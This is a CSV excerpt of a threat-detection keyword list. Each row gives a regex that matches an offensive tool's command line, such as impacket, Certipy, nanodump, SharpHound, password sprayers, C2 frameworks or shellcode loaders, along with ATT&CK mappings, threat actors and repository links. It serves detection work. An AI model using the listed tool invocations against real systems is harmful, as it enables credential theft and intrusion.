"* sgn.exe -i *",".{0,1000}\ssgn\.exe\s\-i\s.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","3067"
"* sgn_linux-arm64*",".{0,1000}\ssgn_linux\-arm64.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","3068"
"* shad0w.py*",".{0,1000}\sshad0w\.py.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","3069"
"* shadow auto -u * -p * -account *",".{0,1000}\sshadow\sauto\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-account\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","3070"
"* -shadowcred -victim *",".{0,1000}\s\-shadowcred\s\-victim\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","3071"
"* --shadow-credentials --shadow-target *",".{0,1000}\s\-\-shadow\-credentials\s\-\-shadow\-target\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3072"
"* --sharepoint-replacement-exe-path *",".{0,1000}\s\-\-sharepoint\-replacement\-exe\-path\s.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3077"
"* SharpBuster.dll*",".{0,1000}\sSharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","3078"
"* SharpBuster.exe*",".{0,1000}\sSharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","3079"
"* SharpC2*",".{0,1000}\sSharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","3080"
"* -SharpChromium *",".{0,1000}\s\-SharpChromium\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3081"
"* SharpDoor.cs*",".{0,1000}\sSharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","3082"
"* SharpDoor.exe*",".{0,1000}\sSharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","3083"
"* -SharpDPAPI -Command *",".{0,1000}\s\-SharpDPAPI\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3084"
"* SharpEDRChecker*",".{0,1000}\sSharpEDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","3085"
"* SharpEfsPotato*",".{0,1000}\sSharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","3086"
"* SharpElevator.exe*",".{0,1000}\sSharpElevator\.exe.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","3087"
"* -SharPersist *",".{0,1000}\s\-SharPersist\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3088"
"* SharpHose.exe*",".{0,1000}\sSharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","3089"
"* SharpHound.html*",".{0,1000}\sSharpHound\.html.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","3090"
"* SharpHound.ps1*",".{0,1000}\sSharpHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","3091"
"* SharpPersistSD.dll*",".{0,1000}\sSharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","3092"
"* SharpRDPHijack*",".{0,1000}\sSharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","3093"
"* SharpRoast.exe*",".{0,1000}\sSharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","3094"
"* -SharpShares *",".{0,1000}\s\-SharpShares\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3095"
"* -SharpSniper *",".{0,1000}\s\-SharpSniper\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3096"
"* SharpSocks *",".{0,1000}\sSharpSocks\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","3097"
"* -SharpSpray *",".{0,1000}\s\-SharpSpray\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3098"
"* sharpspray.exe*",".{0,1000}\ssharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","3099"
"* -SharpUp -Command *",".{0,1000}\s\-SharpUp\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3100"
"* -Sharpview *",".{0,1000}\s\-Sharpview\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3101"
"* -sharpweb -Command *",".{0,1000}\s\-sharpweb\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3102"
"* SharpWSManWinRM.vbs*",".{0,1000}\sSharpWSManWinRM\.vbs.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","3103"
"* --shell tcsh exegol*",".{0,1000}\s\-\-shell\stcsh\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3104"
"* Shell3er.ps1*",".{0,1000}\sShell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","3105"
"* --shellcode *",".{0,1000}\s\-\-shellcode\s.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","0","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","3106"
"* --shellcode *--dc-ip *",".{0,1000}\s\-\-shellcode\s.{0,1000}\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3107"
"* --shellcode *--silent*",".{0,1000}\s\-\-shellcode\s.{0,1000}\-\-silent.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3108"
"* --shellcode --remoteinject*",".{0,1000}\s\-\-shellcode\s\-\-remoteinject.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3109"
"* shellcode_callback.exe*",".{0,1000}\sshellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","3110"
"* shellcode_generate.py*",".{0,1000}\sshellcode_generate\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","3111"
"* shellcode2vba.py*",".{0,1000}\sshellcode2vba\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3112"
"* shellcode2vbafunc.py*",".{0,1000}\sshellcode2vbafunc\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3113"
"* shellcode-xor.py*",".{0,1000}\sshellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","3114"
"* ShellGen.ps1*",".{0,1000}\sShellGen\.ps1.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","3115"
"* shellsilo.py*",".{0,1000}\sshellsilo\.py.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","0","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","3116"
"* Shhhavoc.py*",".{0,1000}\sShhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","3117"
"* shodan-api.nse*",".{0,1000}\sshodan\-api\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3118"
"* Shoggoth.exe*",".{0,1000}\sShoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","3119"
"* --show passwd*",".{0,1000}\s\-\-show\spasswd.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","3120"
"* --show_invalid_creds*",".{0,1000}\s\-\-show_invalid_creds.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","3121"
"* --shtinkering*",".{0,1000}\s\-\-shtinkering.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3122"
"* --shuffle-users* --spray*",".{0,1000}\s\-\-shuffle\-users.{0,1000}\s\-\-spray.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3123"
"* sigflip.*",".{0,1000}\ssigflip\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3124"
"* sigflip.c *",".{0,1000}\ssigflip\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3125"
"* SigFlip.exe*",".{0,1000}\sSigFlip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3126"
